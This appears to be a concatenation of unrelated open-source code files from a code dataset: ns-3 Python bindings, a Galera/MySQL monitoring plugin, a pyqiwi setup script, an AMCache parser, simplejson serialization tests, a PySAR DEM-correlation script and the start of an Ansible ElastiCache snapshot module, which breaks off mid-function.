param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## vector.h (module 'core'): ns3::Vector2D ns3::Vector2DValue::Get() const [member function] cls.add_method('Get', 'ns3::Vector2D', [], is_const=True) ## vector.h (module 'core'): std::string ns3::Vector2DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## vector.h (module 'core'): void ns3::Vector2DValue::Set(ns3::Vector2D const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Vector2D const &', 'value')]) return def register_Ns3Vector3DChecker_methods(root_module, cls): ## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker() [constructor] 
cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker(ns3::Vector3DChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector3DChecker const &', 'arg0')]) return def register_Ns3Vector3DValue_methods(root_module, cls): ## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3DValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector3DValue const &', 'arg0')]) ## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3D const & value) [constructor] cls.add_constructor([param('ns3::Vector3D const &', 'value')]) ## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector3DValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## vector.h (module 'core'): bool ns3::Vector3DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## vector.h (module 'core'): ns3::Vector3D ns3::Vector3DValue::Get() const [member function] cls.add_method('Get', 'ns3::Vector3D', [], is_const=True) ## vector.h (module 'core'): std::string ns3::Vector3DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## vector.h (module 'core'): void ns3::Vector3DValue::Set(ns3::Vector3D const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Vector3D const &', 'value')]) return def register_Ns3AddressChecker_methods(root_module, cls): ## address.h (module 'network'): 
ns3::AddressChecker::AddressChecker() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')]) return def register_Ns3AddressValue_methods(root_module, cls): ## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::AddressValue const &', 'arg0')]) ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor] cls.add_constructor([param('ns3::Address const &', 'value')]) ## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Address', [], is_const=True) ## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Address const &', 'value')]) return def 
register_Ns3HashImplementation_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation(ns3::Hash::Implementation const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation() [constructor] cls.add_constructor([]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Implementation::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_pure_virtual=True, is_virtual=True) ## hash-function.h (module 'core'): uint64_t ns3::Hash::Implementation::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Implementation::clear() [member function] cls.add_method('clear', 'void', [], is_pure_virtual=True, is_virtual=True) return def register_Ns3HashFunctionFnv1a_methods(root_module, cls): ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a(ns3::Hash::Function::Fnv1a const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')]) ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a() [constructor] cls.add_constructor([]) ## hash-fnv.h (module 'core'): uint32_t ns3::Hash::Function::Fnv1a::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-fnv.h (module 'core'): uint64_t ns3::Hash::Function::Fnv1a::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## 
hash-fnv.h (module 'core'): void ns3::Hash::Function::Fnv1a::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionHash32_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Function::Hash32 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Hash32Function_ptr hp) [constructor] cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash32::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Function::Hash32::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionHash64_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Function::Hash64 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Hash64Function_ptr hp) [constructor] cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash64::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): uint64_t ns3::Hash::Function::Hash64::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], 
is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Function::Hash64::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionMurmur3_methods(root_module, cls): ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3(ns3::Hash::Function::Murmur3 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')]) ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3() [constructor] cls.add_constructor([]) ## hash-murmur3.h (module 'core'): uint32_t ns3::Hash::Function::Murmur3::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-murmur3.h (module 'core'): uint64_t ns3::Hash::Function::Murmur3::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-murmur3.h (module 'core'): void ns3::Hash::Function::Murmur3::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_functions(root_module): module = root_module register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module) register_functions_ns3_Hash(module.get_submodule('Hash'), root_module) register_functions_ns3_TracedValueCallback(module.get_submodule('TracedValueCallback'), root_module) return def register_functions_ns3_FatalImpl(module, root_module): return def register_functions_ns3_Hash(module, root_module): register_functions_ns3_Hash_Function(module.get_submodule('Function'), root_module) return def register_functions_ns3_Hash_Function(module, root_module): return def register_functions_ns3_TracedValueCallback(module, root_module): return def main(): out = FileCodeSink(sys.stdout) root_module = module_init() 
register_types(root_module) register_methods(root_module) register_functions(root_module) root_module.generate(out) if __name__ == '__main__': main()
gpl-2.0
darrenchan/rpc-openstack
maas/plugins/galera_check.py
3
5208
#!/usr/bin/env python

# Copyright 2014, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""MaaS plugin that reports Galera cluster health and MySQL metrics.

Runs ``SHOW GLOBAL STATUS`` and ``SHOW GLOBAL VARIABLES`` against a
Galera/MySQL node and emits the results through the maas_common
metric/status helpers.
"""

import optparse
import shlex
import subprocess

from maas_common import metric
from maas_common import print_output
from maas_common import status_err
from maas_common import status_ok


def galera_check(arg):
    """Run a command line and return ``(returncode, stdout, stderr)``.

    :param arg: full command line as a single string; it is tokenized with
        shlex so no shell is involved (``shell=False`` avoids injection).
    """
    proc = subprocess.Popen(shlex.split(arg),
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            shell=False)
    out, err = proc.communicate()
    return proc.returncode, out, err


def generate_query(host, port, output_type='status'):
    """Build the mysql command line for a status or variables query.

    :param host: optional host to pass via ``-h``; empty/None means use
        the defaults from /root/.my.cnf.
    :param port: optional port to pass via ``-P``.
    :param output_type: ``'status'`` for SHOW GLOBAL STATUS or
        ``'variables'`` for SHOW GLOBAL VARIABLES.
    :returns: the full command line string.
    :raises ValueError: for an unknown ``output_type`` (previously this
        silently returned None, which crashed later in shlex.split).
    """
    if host:
        host = ' -h %s' % host
    else:
        host = ''

    if port:
        port = ' -P %s' % port
    else:
        port = ''

    if output_type == 'status':
        return ('/usr/bin/mysql --defaults-file=/root/.my.cnf '
                '%s%s -e "SHOW GLOBAL STATUS"') % (host, port)
    elif output_type == 'variables':
        return ('/usr/bin/mysql --defaults-file=/root/.my.cnf '
                '%s%s -e "SHOW GLOBAL VARIABLES"') % (host, port)
    else:
        raise ValueError('Unknown output_type: %r' % output_type)


def parse_args():
    """Parse command-line options.

    :returns: the ``(options, args)`` pair from optparse.
    """
    parser = optparse.OptionParser(usage='%prog [-h] [-H hostname] [-P port]')
    parser.add_option('-H', '--host', action='store', dest='host',
                      default=None,
                      help='Host to override the defaults with')
    parser.add_option('-P', '--port', action='store', dest='port',
                      default=None,
                      # Fixed typo: was "defauults".
                      help='Port to override the defaults with')
    return parser.parse_args()


def print_metrics(replica_status):
    """Emit the collected status/variable values as MaaS metrics.

    :param replica_status: dict mapping MySQL status/variable names to
        their string values, as produced by main().
    """
    status_ok()
    metric('wsrep_replicated_bytes', 'int64',
           replica_status['wsrep_replicated_bytes'], 'bytes')
    metric('wsrep_received_bytes', 'int64',
           replica_status['wsrep_received_bytes'], 'bytes')
    metric('wsrep_commit_window_size', 'double',
           replica_status['wsrep_commit_window'], 'sequence_delta')
    metric('wsrep_cluster_size', 'int64',
           replica_status['wsrep_cluster_size'], 'nodes')
    metric('queries_per_second', 'int64',
           replica_status['Queries'], 'qps')
    metric('wsrep_cluster_state_uuid', 'string',
           replica_status['wsrep_cluster_state_uuid'])
    metric('wsrep_cluster_status', 'string',
           replica_status['wsrep_cluster_status'])
    metric('wsrep_local_state_uuid', 'string',
           replica_status['wsrep_local_state_uuid'])
    metric('wsrep_local_state_comment', 'string',
           replica_status['wsrep_local_state_comment'])
    metric('mysql_max_configured_connections', 'int64',
           replica_status['max_connections'], 'connections')
    metric('mysql_current_connections', 'int64',
           replica_status['Threads_connected'], 'connections')
    metric('mysql_max_seen_connections', 'int64',
           replica_status['Max_used_connections'], 'connections')
    metric('num_of_open_files', 'int64',
           replica_status['Open_files'], 'files')
    metric('open_files_limit', 'int64',
           replica_status['open_files_limit'], 'files')
    metric('innodb_row_lock_time_avg', 'int64',
           replica_status['Innodb_row_lock_time_avg'], 'milliseconds')
    metric('innodb_deadlocks', 'int64',
           replica_status['Innodb_deadlocks'], 'deadlocks')
    metric('access_denied_errors', 'int64',
           replica_status['Access_denied_errors'], 'access_denied_errors')
    metric('aborted_clients', 'int64',
           replica_status['Aborted_clients'], 'aborted_clients')
    metric('aborted_connects', 'int64',
           replica_status['Aborted_connects'], 'aborted_connects')


def main():
    """Collect Galera status, validate cluster health, emit metrics."""
    options, _ = parse_args()
    replica_status = {}
    for output_type in ['status', 'variables']:
        retcode, output, err = galera_check(
            generate_query(options.host, options.port,
                           output_type=output_type)
        )
        if retcode > 0:
            status_err(err)
        if not output:
            status_err('No output received from mysql. Cannot gather metrics.')
        # Drop the header row and the trailing empty element; each remaining
        # row is "<name>\t<value>".
        # NOTE(review): assumes `output` is text (Python 2 era); under
        # Python 3 subprocess returns bytes — confirm before porting.
        show_list = output.split('\n')[1:-1]
        for row in show_list:
            replica_status[row.split('\t')[0]] = row.split('\t')[1]

    if replica_status['wsrep_cluster_status'] != "Primary":
        status_err("there is a partition in the cluster")

    if (replica_status['wsrep_local_state_uuid'] !=
            replica_status['wsrep_cluster_state_uuid']):
        status_err("the local node is out of sync")

    # wsrep_local_state 4 with comment "Synced" means the node is fully
    # joined and replicating; only then are the metrics meaningful.
    if (int(replica_status['wsrep_local_state']) == 4 and
            replica_status['wsrep_local_state_comment'] == "Synced"):
        print_metrics(replica_status)


if __name__ == '__main__':
    with print_output():
        main()
apache-2.0
onrik/pyqiwi
setup.py
1
1037
#!/usr/bin/env python # -*- coding: utf-8 -*- from setuptools import setup from pyqiwi import __version__ setup( name='pyqiwi', version=__version__, author='Andrey', author_email='and@rey.im', description='Client for QIWI payment system', license='MIT', url='https://github.com/onrik/pyqiwi', packages=['pyqiwi'], test_suite='tests', tests_require=[ 'httpretty' ], classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Topic :: Software Development :: Libraries :: Python Modules', ], )
mit
libyal/dtformats
scripts/amcache.py
1
1588
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Script to parse Amcache.hve files."""

import argparse
import logging
import sys

from dtformats import amcache
from dtformats import output_writers


def Main():
  """The main program function.

  Returns:
    bool: True if successful or False if not.
  """
  # Fixed copy-pasted argparse text: this script parses Windows AMCache
  # files, not Apple System Log files.
  argument_parser = argparse.ArgumentParser(description=(
      'Extracts information from Windows AMCache (Amcache.hve) files.'))

  argument_parser.add_argument(
      '-d', '--debug', dest='debug', action='store_true', default=False,
      help='enable debug output.')

  argument_parser.add_argument(
      'source', nargs='?', action='store', metavar='PATH',
      default=None, help='path of the Windows AMCache file.')

  options = argument_parser.parse_args()

  if not options.source:
    print('Source file missing.')
    print('')
    argument_parser.print_help()
    print('')
    return False

  logging.basicConfig(
      level=logging.INFO, format='[%(levelname)s] %(message)s')

  output_writer = output_writers.StdoutWriter()

  try:
    output_writer.Open()
  except IOError as exception:
    print('Unable to open output writer with error: {0!s}'.format(exception))
    print('')
    return False

  amcache_file = amcache.WindowsAMCacheFile(
      debug=options.debug, output_writer=output_writer)
  amcache_file.Open(options.source)

  output_writer.WriteText('AMCache information:')

  # TODO: print amcache information.

  amcache_file.Close()

  output_writer.Close()

  return True


if __name__ == '__main__':
  if not Main():
    sys.exit(1)
  else:
    sys.exit(0)
apache-2.0
CoderBotOrg/coderbotsrv
server/lib/simplejson/tests/test_dump.py
104
4999
"""Tests for simplejson's dump/dumps serialization behavior."""
from unittest import TestCase

from simplejson.compat import StringIO, long_type, b, binary_type, PY3
import simplejson as json


def as_text_type(s):
    # Normalize a bytes key to text on Python 3 so expected dicts compare
    # equal to what json.loads produces (JSON keys are always text).
    if PY3 and isinstance(s, binary_type):
        return s.decode('ascii')
    return s


class TestDump(TestCase):
    def test_dump(self):
        # dump() writes to a file-like object rather than returning a string.
        sio = StringIO()
        json.dump({}, sio)
        self.assertEqual(sio.getvalue(), '{}')

    def test_constants(self):
        # None/True/False must round-trip to the identical singletons,
        # both bare and nested in containers.
        for c in [None, True, False]:
            self.assertTrue(json.loads(json.dumps(c)) is c)
            self.assertTrue(json.loads(json.dumps([c]))[0] is c)
            self.assertTrue(json.loads(json.dumps({'a': c}))['a'] is c)

    def test_stringify_key(self):
        # Non-string keys are coerced to their JSON string forms; an
        # unserializable key (a module object) raises TypeError unless
        # skipkeys=True, in which case it is silently dropped.
        items = [(b('bytes'), 'bytes'),
                 (1.0, '1.0'),
                 (10, '10'),
                 (True, 'true'),
                 (False, 'false'),
                 (None, 'null'),
                 (long_type(100), '100')]
        for k, expect in items:
            self.assertEqual(
                json.loads(json.dumps({k: expect})),
                {expect: expect})
            self.assertEqual(
                json.loads(json.dumps({k: expect}, sort_keys=True)),
                {expect: expect})
        self.assertRaises(TypeError, json.dumps, {json: 1})
        for v in [{}, {'other': 1}, {b('derp'): 1, 'herp': 2}]:
            for sort_keys in [False, True]:
                v0 = dict(v)
                v0[json] = 1
                v1 = dict((as_text_type(key), val)
                          for (key, val) in v.items())
                self.assertEqual(
                    json.loads(json.dumps(v0, skipkeys=True,
                                          sort_keys=sort_keys)),
                    v1)
                self.assertEqual(
                    json.loads(json.dumps({'': v0}, skipkeys=True,
                                          sort_keys=sort_keys)),
                    {'': v1})
                self.assertEqual(
                    json.loads(json.dumps([v0], skipkeys=True,
                                          sort_keys=sort_keys)),
                    [v1])

    def test_dumps(self):
        self.assertEqual(json.dumps({}), '{}')

    def test_encode_truefalse(self):
        # Boolean and numeric keys stringify and then sort as strings.
        self.assertEqual(json.dumps(
            {True: False, False: True}, sort_keys=True),
            '{"false": true, "true": false}')
        self.assertEqual(json.dumps(
            {2: 3.0, 4.0: long_type(5), False: 1, long_type(6): True,
             "7": 0},
            sort_keys=True),
            '{"2": 3.0, "4.0": 5, "6": true, "7": 0, "false": 1}')

    def test_ordered_dict(self):
        # http://bugs.python.org/issue6105
        # OrderedDict keys must serialize in insertion order, not sorted.
        items = [('one', 1), ('two', 2), ('three', 3), ('four', 4),
                 ('five', 5)]
        s = json.dumps(json.OrderedDict(items))
        self.assertEqual(
            s,
            '{"one": 1, "two": 2, "three": 3, "four": 4, "five": 5}')

    def test_indent_unknown_type_acceptance(self):
        """
        A test against the regression mentioned at `github issue 29`_.

        The indent parameter should accept any type which pretends to be
        an instance of int or long when it comes to being multiplied by
        strings, even if it is not actually an int or long, for
        backwards compatibility.

        .. _github issue 29: http://github.com/simplejson/simplejson/issue/29
        """
        class AwesomeInt(object):
            """An awesome reimplementation of integers"""

            def __init__(self, *args, **kwargs):
                if len(args) > 0:
                    # [construct from literals, objects, etc.]
                    # ...

                    # Finally, if args[0] is an integer, store it
                    if isinstance(args[0], int):
                        self._int = args[0]

            # [various methods]

            def __mul__(self, other):
                # [various ways to multiply AwesomeInt objects]
                # ... finally, if the right-hand operand is not awesome enough,
                # try to do a normal integer multiplication
                if hasattr(self, '_int'):
                    return self._int * other
                else:
                    raise NotImplementedError("To do non-awesome things with"
                        " this object, please construct it from an integer!")

        s = json.dumps([0, 1, 2], indent=AwesomeInt(3))
        self.assertEqual(s, '[\n   0,\n   1,\n   2\n]')

    def test_accumulator(self):
        # the C API uses an accumulator that collects after 100,000 appends
        lst = [0] * 100000
        self.assertEqual(json.loads(json.dumps(lst)), lst)

    def test_sort_keys(self):
        # https://github.com/simplejson/simplejson/issues/106
        # dump() and dumps() must agree for sorted keys at many sizes.
        for num_keys in range(2, 32):
            p = dict((str(x), x) for x in range(num_keys))
            sio = StringIO()
            json.dump(p, sio, sort_keys=True)
            self.assertEqual(sio.getvalue(), json.dumps(p, sort_keys=True))
            self.assertEqual(json.loads(sio.getvalue()), p)
gpl-3.0
mohseniaref/PySAR-1
pysar/correlation_with_dem.py
1
2229
#! /usr/bin/env python
############################################################
# Program is part of PySAR v1.0                            #
# Copyright(c) 2013, Heresh Fattahi                        #
# Author:  Heresh Fattahi                                  #
############################################################
# NOTE: Python 2 script (print statements); computes the correlation
# between a DEM and an InSAR velocity field stored in an HDF5 file.

import sys
import os
import getopt
import h5py
import numpy as np
import matplotlib.pyplot as plt
import _readfile as readfile


def Usage():
    # Print command-line usage help.
    print '''
************************************************************************
************************************************************************
    Calculates the correlation of the dem with the InSAR velocity field.

    Usage:
         correlation_with_dem.py dem velocity

    Example:
         correlation_with_dem.py radar_8rlks.hgt velocity.h5

***********************************************************************
***********************************************************************
'''


# Positional args: DEM file and velocity HDF5 file; bail out with usage
# help if either is missing.
try:
    demFile=sys.argv[1]
    File=sys.argv[2]
except:
    Usage()
    sys.exit(1)

# Load the DEM; .hgt files carry an amplitude band alongside the heights,
# .dem files carry heights only.
if os.path.basename(demFile).split('.')[1]=='hgt':
    amp,dem,demRsc = readfile.read_float32(demFile)
elif os.path.basename(demFile).split('.')[1]=='dem':
    dem,demRsc = readfile.read_dem(demFile)
    #amp,dem,demRsc = readfile.read_float32(demFile)

# Read the full velocity raster from the HDF5 dataset.
h5data = h5py.File(File)
dset = h5data['velocity'].get('velocity')
data = dset[0:dset.shape[0],0:dset.shape[1]]

# Optional subset: argv[3]/argv[4] as "y0:y1" and "x0:x1"; silently fall
# back to the full scene when absent or malformed.
try:
    suby=sys.argv[3].split(':')
    subx=sys.argv[4].split(':')
    data = data[int(suby[0]):int(suby[1]),int(subx[0]):int(subx[1])]
    dem = dem[int(suby[0]):int(suby[1]),int(subx[0]):int(subx[1])]
except:
    print 'no subset'

# Flatten column-major and keep only pixels with a valid (non-NaN)
# velocity; stack DEM and velocity as the two rows of C1 for corrcoef.
dem=dem.flatten(1)
data=data.flatten(1)
ndx = ~np.isnan(data)
C1=np.zeros([2,len(dem[ndx])])
C1[0][:]=dem[ndx]
C1[1][:]=data[ndx]

# Report the off-diagonal element of the 2x2 correlation matrix plus
# simple DEM statistics over the valid pixels.
print '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
print ''
print 'Correlation of the velocity with the DEM: '+ str(np.corrcoef(C1)[0][1])
print ''
print'+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++'
print 'DEM info:'
print ''
print 'Maximum height difference (m) : ' + str(np.max(dem[ndx])-np.min(dem[ndx]))
print 'Average height (m) :'+str(np.mean(dem[ndx]))
print 'Height Std: '+str(np.std(dem[ndx]))
mit
Anonymouslemming/ansible
lib/ansible/modules/cloud/amazon/elasticache_snapshot.py
35
8089
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible.  If not, see <http://www.gnu.org/licenses/>.

ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'community'}

DOCUMENTATION = """
---
module: elasticache_snapshot
short_description: Manage cache snapshots in Amazon Elasticache.
description:
  - Manage cache snapshots in Amazon Elasticache.
  - Returns information about the specified snapshot.
version_added: "2.3"
author: "Sloane Hertel (@s-hertel)"
requirements: [ boto3, botocore ]
options:
  name:
    description:
      - The name of the snapshot we want to create, copy, delete
    required: yes
  state:
    description:
      - Actions that will create, destroy, or copy a snapshot.
    choices: ['present', 'absent', 'copy']
  replication_id:
    description:
      - The name of the existing replication group to make the snapshot.
    required: no
    default: null
  cluster_id:
    description:
      - The name of an existing cache cluster in the replication group to make the snapshot.
    required: no
    default: null
  target:
    description:
      - The name of a snapshot copy
    required: no
    default: null
  bucket:
    description:
      - The s3 bucket to which the snapshot is exported
    required: no
    default: null
"""

EXAMPLES = """
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
---
- hosts: localhost
  connection: local
  tasks:
    - name: 'Create a snapshot'
      elasticache_snapshot:
        name: 'test-snapshot'
        state: 'present'
        cluster_id: '{{ cluster }}'
        replication_id: '{{ replication }}'
"""

RETURN = """
response_metadata:
  description: response metadata about the snapshot
  returned: always
  type: dict
  sample:
    http_headers:
      content-length: 1490
      content-type: text/xml
      date: Tue, 07 Feb 2017 16:43:04 GMT
      x-amzn-requestid: 7f436dea-ed54-11e6-a04c-ab2372a1f14d
    http_status_code: 200
    request_id: 7f436dea-ed54-11e6-a04c-ab2372a1f14d
    retry_attempts: 0
snapshot:
  description: snapshot data
  returned: always
  type: dict
  sample:
    auto_minor_version_upgrade: true
    cache_cluster_create_time: 2017-02-01T17:43:58.261000+00:00
    cache_cluster_id: test-please-delete
    cache_node_type: cache.m1.small
    cache_parameter_group_name: default.redis3.2
    cache_subnet_group_name: default
    engine: redis
    engine_version: 3.2.4
    node_snapshots:
      cache_node_create_time: 2017-02-01T17:43:58.261000+00:00
      cache_node_id: 0001
      cache_size:
    num_cache_nodes: 1
    port: 11211
    preferred_availability_zone: us-east-1d
    preferred_maintenance_window: wed:03:00-wed:04:00
    snapshot_name: deletesnapshot
    snapshot_retention_limit: 0
    snapshot_source: manual
    snapshot_status: creating
    snapshot_window: 10:00-11:00
    vpc_id: vpc-c248fda4
changed:
  description: if a snapshot has been created, deleted, or copied
  returned: always
  type: bool
  sample:
    changed: true
"""

# import module snippets
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import boto3_conn, get_aws_connection_info, ec2_argument_spec, camel_dict_to_snake_dict
import traceback

try:
    import boto3
    import botocore
    HAS_BOTO3 = True
except ImportError:
    HAS_BOTO3 = False


def create(module, connection, replication_id, cluster_id, name):
    """Create an Elasticache backup.

    :param module: AnsibleModule instance, used for failure reporting.
    :param connection: boto3 elasticache client.
    :param replication_id: replication group to snapshot.
    :param cluster_id: cache cluster within the replication group.
    :param name: name of the snapshot to create.
    :returns: tuple of (API response dict, changed flag). An already
        existing snapshot is treated as unchanged rather than an error.
    """
    try:
        response = connection.create_snapshot(ReplicationGroupId=replication_id,
                                              CacheClusterId=cluster_id,
                                              SnapshotName=name)
        changed = True
    except botocore.exceptions.ClientError as e:
        if e.response['Error']['Code'] == "SnapshotAlreadyExistsFault":
            response = {}
            changed = False
        else:
            module.fail_json(msg="Unable to create the snapshot.", exception=traceback.format_exc())
    return response, changed


def copy(module, connection, name, target, bucket):
    """Copy an Elasticache backup.

    :param name: source snapshot name.
    :param target: name for the snapshot copy.
    :param bucket: s3 bucket the snapshot is exported to.
    :returns: tuple of (API response dict, changed flag).
    """
    try:
        response = connection.copy_snapshot(SourceSnapshotName=name,
                                            TargetSnapshotName=target,
                                            TargetBucket=bucket)
        changed = True
    except botocore.exceptions.ClientError:
        module.fail_json(msg="Unable to copy the snapshot.", exception=traceback.format_exc())
    return response, changed


def delete(module, connection, name):
    """Delete an Elasticache backup.

    :param name: name of the snapshot to delete.
    :returns: tuple of (API response dict, changed flag). A missing
        snapshot is treated as unchanged rather than an error.
    """
    try:
        response = connection.delete_snapshot(SnapshotName=name)
        changed = True
    except botocore.exceptions.ClientError as e:
        if e.response['Error']['Code'] == "SnapshotNotFoundFault":
            response = {}
            changed = False
        elif e.response['Error']['Code'] == "InvalidSnapshotState":
            # Fixed: the implicitly-concatenated message was missing a
            # space between "deletion." and "You may".
            module.fail_json(msg="Error: InvalidSnapshotState. The snapshot is not in an available state or failed state to allow deletion. "
                                 "You may need to wait a few minutes.")
        else:
            module.fail_json(msg="Unable to delete the snapshot.", exception=traceback.format_exc())
    return response, changed


def main():
    """Entry point: dispatch to create/copy/delete based on `state`."""
    argument_spec = ec2_argument_spec()
    argument_spec.update(
        dict(
            name=dict(required=True, type='str'),
            state=dict(required=True, type='str', choices=['present', 'absent', 'copy']),
            replication_id=dict(type='str'),
            cluster_id=dict(type='str'),
            target=dict(type='str'),
            bucket=dict(type='str'),
        )
